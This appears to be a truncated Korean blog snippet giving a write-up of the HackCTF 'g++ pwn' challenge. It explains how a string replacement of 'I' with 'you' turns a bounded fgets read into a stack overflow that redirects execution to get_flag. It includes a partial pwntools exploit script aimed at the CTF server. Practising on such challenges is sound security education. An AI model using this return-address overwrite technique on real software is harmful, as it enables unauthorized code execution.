Hack CTF
-
[HackCTF : Pwnable] g++ pwn (200p)Wargame/HackCTF 2021. 11. 15. 17:31
[HackCTF : Pwnable] g++ pwn (200p) 입력받고 출력해준다. vuln()이 실행됨 fgets로 입력받는데 32byte를 받기 때문에 bof가 안 터지는데 replace를 통해 I를 you로 바꿔주기 때문에 ret를 건드릴 수 있다. 0x3c에 입력을 받기 때문에 0x3c + 0x4 [sfp] 만큼 덮어주면 된다. 그리고 get_flag 주소를 넣어주면됨 1 2 3 4 5 6 7 8 9 10 11 12 from pwn import * #p = process("./gpwn") p = remote("ctf.j0n9hyun.xyz",3011) flag = 0x08048f0d payload = "I"*20 payload += "A"*4 payload += p32(flag) p.sendlin..